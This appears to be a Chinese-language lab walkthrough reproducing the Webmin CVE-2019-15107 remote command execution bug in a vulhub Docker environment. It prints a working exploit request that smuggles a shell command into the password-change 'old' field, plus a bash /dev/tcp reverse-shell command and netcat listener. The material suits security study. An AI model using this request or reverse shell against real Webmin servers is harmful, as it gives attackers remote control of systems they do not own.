Webmin 远程命令执行漏洞_CVE-2019-15107

Webmin 远程命令执行漏洞_CVE-2019-15107

文章目录

    • Webmin 远程命令执行漏洞_CVE-2019-15107
      • 在线漏洞详情:
      • 漏洞描述:
      • 版本影响:
      • 环境搭建
      • 漏洞复现
      • 使用BP进行抓包
        • POC
        • 发送以下POST请求来执行命令id:
        • 复现成功
      • 漏洞利用-shell反弹
        • 执行反弹指令
        • bp的id替换成url编码反弹shell脚本
        • 成功反弹

在线漏洞详情:

https://vulhub.org/#/environments/webmin/CVE-2019-15107/

Webmin 远程命令执行漏洞_CVE-2019-15107_第1张图片

漏洞描述:

Webmin 远程命令执行漏洞_CVE-2019-15107_第2张图片

版本影响:

​ Webmin 1.910

环境搭建

cd ~/vulhub/webmin/CVE-2019-15107

Webmin 远程命令执行漏洞_CVE-2019-15107_第3张图片

环境启动:

sudo docker-compose up -d  # 下载拉取环境

sudo docker ps -a  # 查看下载拉取的文件

已启动:访问端口10000

在这里插入图片描述

漏洞复现

访问https://192.168.225.166:10000/
Webmin 远程命令执行漏洞_CVE-2019-15107_第4张图片

使用BP进行抓包

POC
POST /password_change.cgi
发送以下POST请求来执行命令id:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
复现成功

Webmin 远程命令执行漏洞_CVE-2019-15107_第5张图片

漏洞利用-shell反弹

执行反弹指令
bash -c "bash -i &> /dev/tcp/192.168.225.166/6666 0<&1" 

nc  -lvp  6666 
bp的id替换成url编码反弹shell脚本

Webmin 远程命令执行漏洞_CVE-2019-15107_第6张图片

成功反弹

Webmin 远程命令执行漏洞_CVE-2019-15107_第7张图片

你可能感兴趣的:(漏洞复现,网络安全,web安全,安全)